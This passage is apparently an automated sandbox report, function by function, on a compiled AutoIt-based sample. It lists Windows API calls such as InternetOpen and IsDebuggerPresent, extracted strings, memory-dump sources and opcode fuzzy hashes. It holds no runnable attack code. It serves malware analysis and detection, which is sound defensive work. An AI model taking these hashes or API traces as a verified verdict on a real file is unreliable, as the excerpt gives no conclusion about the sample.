                                                                  • String ID: pow
                                                                  • API String ID: 3213639722-2276729525
                                                                  • Opcode ID: fcabdf1287225b26aedd64e2179a7396a3ce0a767cecb18b9f076266247b40bd
                                                                  • Instruction ID: 43021f209d6edefc32b934da6e8376c20e4851e1ba7a20c6b6e76f92530f9523
                                                                  • Opcode Fuzzy Hash: fcabdf1287225b26aedd64e2179a7396a3ce0a767cecb18b9f076266247b40bd
                                                                  • Instruction Fuzzy Hash: 51517A61E085038AC7217714CD017FA2BA3BB20752F208D58F8D5537E8DF368D9A9B4A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: #
                                                                  • API String ID: 0-1885708031
                                                                  • Opcode ID: 46ec0164dd7fb0e7d59b1773a13a17ff5304e69819f526f170fcd8896dc35429
                                                                  • Instruction ID: d1918fdc135520552c8b5f10e337bf83c5595c80e1fe5d0b1054990373efcbee
                                                                  • Opcode Fuzzy Hash: 46ec0164dd7fb0e7d59b1773a13a17ff5304e69819f526f170fcd8896dc35429
                                                                  • Instruction Fuzzy Hash: 57514331544246DFDB25DF68C449AFA7BA2EF15320F248059F895AB3D0DB709D82CBA1
                                                                  APIs
                                                                  • Sleep.KERNEL32(00000000), ref: 0063F6DB
                                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 0063F6F4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: GlobalMemorySleepStatus
                                                                  • String ID: @
                                                                  • API String ID: 2783356886-2766056989
                                                                  • Opcode ID: 6d553f1667870fde8ec676e76ee810754f8928b2229e98a9c20b03c746c6bdf9
                                                                  • Instruction ID: c1c80d56711baf046cf7b9482a071cad57eeb2deb60fe7c56a8d4664a84bcc6c
                                                                  • Opcode Fuzzy Hash: 6d553f1667870fde8ec676e76ee810754f8928b2229e98a9c20b03c746c6bdf9
                                                                  • Instruction Fuzzy Hash: FF516971809B599FD360AF14EC86BABB7F9FB94300F81885DF1D942191DF318528CB2A
                                                                  APIs
                                                                  • DestroyWindow.USER32(?,?,?,?), ref: 006B40BD
                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 006B40F8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Window$DestroyMove
                                                                  • String ID: static
                                                                  • API String ID: 2139405536-2160076837
                                                                  • Opcode ID: 5f3338b41f5c7b2a2d9811d17a7d6ad4839679cf34a68caeb0ab95aca3c62f1b
                                                                  • Instruction ID: acb282a6793e2c7ec0231e68cbb584f2b0c8e160811d833849fc4c8808084265
                                                                  • Opcode Fuzzy Hash: 5f3338b41f5c7b2a2d9811d17a7d6ad4839679cf34a68caeb0ab95aca3c62f1b
                                                                  • Instruction Fuzzy Hash: 83318DB1100604AADB209F68CC80EFB77AAFF48764F00861DF9A587291DA71AC81CB64
                                                                  APIs
                                                                  • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 006B50BD
                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 006B50D2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: '
                                                                  • API String ID: 3850602802-1997036262
                                                                  • Opcode ID: f5809c5dace2cb2275532edbdcf71f7ba6de2aadb377bde98db667bc6569f45e
                                                                  • Instruction ID: 1894c16a4845929912aeb929bf10e1cac7168621f215e63f585c2f39fc58534c
                                                                  • Opcode Fuzzy Hash: f5809c5dace2cb2275532edbdcf71f7ba6de2aadb377bde98db667bc6569f45e
                                                                  • Instruction Fuzzy Hash: AF312AB4A0170A9FDB14DF69C891BEE7BB6FF49300F10406AE905AB351D771A985CF90
                                                                  APIs
                                                                    • Part of subcall function 0062249F: GetWindowLongW.USER32(00000000,000000EB), ref: 006224B0
                                                                    • Part of subcall function 00622234: GetWindowLongW.USER32(?,000000EB), ref: 00622242
                                                                  • GetParent.USER32(?), ref: 00663440
                                                                  • DefDlgProcW.USER32(?,00000133,?,?,?,?), ref: 006634CA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: LongWindow$ParentProc
                                                                  • String ID: (o
                                                                  • API String ID: 2181805148-1684096767
                                                                  • Opcode ID: 581bd5629f2d701b8432d394fec20cd4cbf211f033b0afcab0077056470f929e
                                                                  • Instruction ID: 3e8f825e634272a2ae5debd3e891ee6f42904965eba095e4ef5bc5c5dd74fbcc
                                                                  • Opcode Fuzzy Hash: 581bd5629f2d701b8432d394fec20cd4cbf211f033b0afcab0077056470f929e
                                                                  • Instruction Fuzzy Hash: 72219E30201565BFCB269F68D869DF93BA7EF06360F144244F7250B3E2D7318EA6DA10
                                                                  APIs
                                                                    • Part of subcall function 00627873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 006278B1
                                                                    • Part of subcall function 00627873: GetStockObject.GDI32(00000011), ref: 006278C5
                                                                    • Part of subcall function 00627873: SendMessageW.USER32(00000000,00000030,00000000), ref: 006278CF
                                                                  • GetWindowRect.USER32(00000000,?), ref: 006B4216
                                                                  • GetSysColor.USER32(00000012), ref: 006B4230
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                  • String ID: static
                                                                  • API String ID: 1983116058-2160076837
                                                                  • Opcode ID: f767c2c6fd305d2ece6f065a803bfdae782005171d0889e5074e51d59b86bfb9
                                                                  • Instruction ID: 882de49da78221a8f7034fc6015be6be7ce6f947d053196a1d531d3a7ccd8ed7
                                                                  • Opcode Fuzzy Hash: f767c2c6fd305d2ece6f065a803bfdae782005171d0889e5074e51d59b86bfb9
                                                                  • Instruction Fuzzy Hash: 8A1129B2610209AFDB00DFA8CC45AFA7BA9EF08354F014524F955D7251EA34E891EB50
                                                                  APIs
                                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0069D7C2
                                                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0069D7EB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Internet$OpenOption
                                                                  • String ID: <local>
                                                                  • API String ID: 942729171-4266983199
                                                                  • Opcode ID: ec15cff93cd1a98829a7394d80d15c6415979c3e18948450926cb9043e8d53d9
                                                                  • Instruction ID: 1f564e682610eeb40c308d09f95156a9fa007dbde698d02eb31188006031b5f6
                                                                  • Opcode Fuzzy Hash: ec15cff93cd1a98829a7394d80d15c6415979c3e18948450926cb9043e8d53d9
                                                                  • Instruction Fuzzy Hash: 8C110C7110523279DF344BE68C85EF7BE5EEF127A4F104236F5099B680D6749841D6F0
                                                                  APIs
                                                                    • Part of subcall function 0062B329: _wcslen.LIBCMT ref: 0062B333
                                                                  • CharUpperBuffW.USER32(?,?,?), ref: 0068761D
                                                                  • _wcslen.LIBCMT ref: 00687629
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$BuffCharUpper
                                                                  • String ID: STOP
                                                                  • API String ID: 1256254125-2411985666
                                                                  • Opcode ID: 5384e169d4a77637c48d6f3bf1b52e1b47adf714e28dfce05f49cb895fa9e77b
                                                                  • Instruction ID: 236bf97fad2f30882f0ba9fdf04e98c4ec9df146c717b0ba9b729c29444181b3
                                                                  • Opcode Fuzzy Hash: 5384e169d4a77637c48d6f3bf1b52e1b47adf714e28dfce05f49cb895fa9e77b
                                                                  • Instruction Fuzzy Hash: 97018432A149268BCB10BEBDEC519FF77B7AF617507600728E42596291FB31D980D790
                                                                  APIs
                                                                    • Part of subcall function 0062B329: _wcslen.LIBCMT ref: 0062B333
                                                                    • Part of subcall function 006845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00684620
                                                                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00682699
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ClassMessageNameSend_wcslen
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 624084870-1403004172
                                                                  • Opcode ID: d0e9a29a0d08b46007c84af1e7f78396590fdc6bb57d3fe9435861cb54b67b9f
                                                                  • Instruction ID: c2a39401f25818828923ebd4053ca61019b0f6e27ef64b5680071d6a885cb7b9
                                                                  • Opcode Fuzzy Hash: d0e9a29a0d08b46007c84af1e7f78396590fdc6bb57d3fe9435861cb54b67b9f
                                                                  • Instruction Fuzzy Hash: 2801F175641226ABCB04FBA0CC61CFE336AEF46360B000B1DB832A73C1EA3158088B54
                                                                  APIs
                                                                    • Part of subcall function 0062B329: _wcslen.LIBCMT ref: 0062B333
                                                                    • Part of subcall function 006845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00684620
                                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 00682593
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ClassMessageNameSend_wcslen
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 624084870-1403004172
                                                                  • Opcode ID: 03a05cd7ed26da5f42f9ac811281a39f178d5b8e4df78255d685f3138148f3d4
                                                                  • Instruction ID: ba9d1a626623d0fcd6f71f64d7731f85eb3c8a4af978f735bcd8603da9f2e8ef
                                                                  • Opcode Fuzzy Hash: 03a05cd7ed26da5f42f9ac811281a39f178d5b8e4df78255d685f3138148f3d4
                                                                  • Instruction Fuzzy Hash: 70018475681116ABCB04F790D972DFE77AADF55340F5012297902A7281DA509E088BB6
                                                                  APIs
                                                                    • Part of subcall function 0062B329: _wcslen.LIBCMT ref: 0062B333
                                                                    • Part of subcall function 006845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00684620
                                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 00682615
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ClassMessageNameSend_wcslen
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 624084870-1403004172
                                                                  • Opcode ID: 3694b4f8832b771fa189cb866ccdd56bad7baebf253e99328e9d69426609d910
                                                                  • Instruction ID: 607785dfb506a38bc6ddd61429cbfbce9596cc2498fc4c7a06a8b20a0758c02c
                                                                  • Opcode Fuzzy Hash: 3694b4f8832b771fa189cb866ccdd56bad7baebf253e99328e9d69426609d910
                                                                  • Instruction Fuzzy Hash: 8B01F9B5A4111667CB05F7A0D921EFF77AADF15340F501229B802B3281EF619E0DDBB6
                                                                  APIs
                                                                    • Part of subcall function 0062B329: _wcslen.LIBCMT ref: 0062B333
                                                                    • Part of subcall function 006845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00684620
                                                                  • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00682720
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ClassMessageNameSend_wcslen
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 624084870-1403004172
                                                                  • Opcode ID: 423c176ff5a1fb9cf368facab0230a3c30ee2d2d4814409974cbf848c8266383
                                                                  • Instruction ID: 97a5eebf7b541f2a98d36389549fd58dbc5b84ac9903a08288713b04289f3ac3
                                                                  • Opcode Fuzzy Hash: 423c176ff5a1fb9cf368facab0230a3c30ee2d2d4814409974cbf848c8266383
                                                                  • Instruction Fuzzy Hash: 1DF0F4B5A41225A7CB04F3A4DC61FFE736AEF05390F401A19B422A32C1EF60580C87A4
                                                                  APIs
                                                                    • Part of subcall function 0062249F: GetWindowLongW.USER32(00000000,000000EB), ref: 006224B0
                                                                  • DefDlgProcW.USER32(?,0000002B,?,?,?), ref: 006B9B6D
                                                                    • Part of subcall function 00622234: GetWindowLongW.USER32(?,000000EB), ref: 00622242
                                                                  • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 006B9B53
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: LongWindow$MessageProcSend
                                                                  • String ID: (o
                                                                  • API String ID: 982171247-1684096767
                                                                  • Opcode ID: 59cc5056f72b9ca9303eeaeff45898dc8f2c302b86fa1d47e29698dfe446e3c4
                                                                  • Instruction ID: eb6d88433947d2d00c1bba5f91b533b026010bd6a1c16f173b9980770ae4d4ef
                                                                  • Opcode Fuzzy Hash: 59cc5056f72b9ca9303eeaeff45898dc8f2c302b86fa1d47e29698dfe446e3c4
                                                                  • Instruction Fuzzy Hash: 1B01DF71201214BBCB25AF14EC54FE63BA7FB85365F100668FA120B2E0C7726896DF64
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 2<e$j3l
                                                                  • API String ID: 0-1518692914
                                                                  • Opcode ID: 02b3b253782144b164f036ca01e9538a0a53da3400be8c2dc62b141bc6193bb8
                                                                  • Instruction ID: 3f0aedebba72f34465a65e8b6971f40ad51e2a017022192f90b80933dd7f1eac
                                                                  • Opcode Fuzzy Hash: 02b3b253782144b164f036ca01e9538a0a53da3400be8c2dc62b141bc6193bb8
                                                                  • Instruction Fuzzy Hash: 15F0F035100158AADB148F90C840AF933AADB04B42F00406ABC89CB380EA758F85D365
                                                                  APIs
                                                                    • Part of subcall function 0062249F: GetWindowLongW.USER32(00000000,000000EB), ref: 006224B0
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 006B8471
                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 006B847F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: LongWindow
                                                                  • String ID: (o
                                                                  • API String ID: 1378638983-1684096767
                                                                  • Opcode ID: 7ce02a33514ab1e09e7452b239f7184540b5f959f3e676ec9760104e0d16694f
                                                                  • Instruction ID: 53a6dda573dbc479994c1d73142915715b210e2bb3db0714bab4129db007b9e6
                                                                  • Opcode Fuzzy Hash: 7ce02a33514ab1e09e7452b239f7184540b5f959f3e676ec9760104e0d16694f
                                                                  • Instruction Fuzzy Hash: 49F03C751012069FC704DF69DC549AA77ABFB86324B108629FA268B3B1EB709851DF50
                                                                  APIs
                                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0068146F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Message
                                                                  • String ID: AutoIt$Error allocating memory.
                                                                  • API String ID: 2030045667-4017498283
                                                                  • Opcode ID: 23968fcaeb8151e0e6e8de6be069b3d1c0b1168cef74bf9ffeb8690d7e728d19
                                                                  • Instruction ID: 87acc62d9bbda82ab558ee3fcf52802b70f70388393566118fcfa30d54b876b3
                                                                  • Opcode Fuzzy Hash: 23968fcaeb8151e0e6e8de6be069b3d1c0b1168cef74bf9ffeb8690d7e728d19
                                                                  • Instruction Fuzzy Hash: 6BE012722857252AE3543694AC03BC97A8B8B05B55F11442EB748AA5C39AF22590479D
                                                                  APIs
                                                                    • Part of subcall function 0063FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,006410E2,?,?,?,0062100A), ref: 0063FAD9
                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,0062100A), ref: 006410E6
                                                                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0062100A), ref: 006410F5
                                                                  Strings
                                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 006410F0
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                  • API String ID: 55579361-631824599
                                                                  • Opcode ID: 4c07c3414cf7890b43d4c629ace916630d9ea550bef40dafcf063c3a07ddfa9e
                                                                  • Instruction ID: 467a971088eb5d5dbc48f5ab085b117fd72ad0ef74b161a0b2558653739374e5
                                                                  • Opcode Fuzzy Hash: 4c07c3414cf7890b43d4c629ace916630d9ea550bef40dafcf063c3a07ddfa9e
                                                                  • Instruction Fuzzy Hash: 9DE06DB06007518BE3609F24E804B52BFE7EF05704F00892CE985CB651EBB5D484CF91
                                                                  APIs
                                                                  • __Init_thread_footer.LIBCMT ref: 0063F151
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
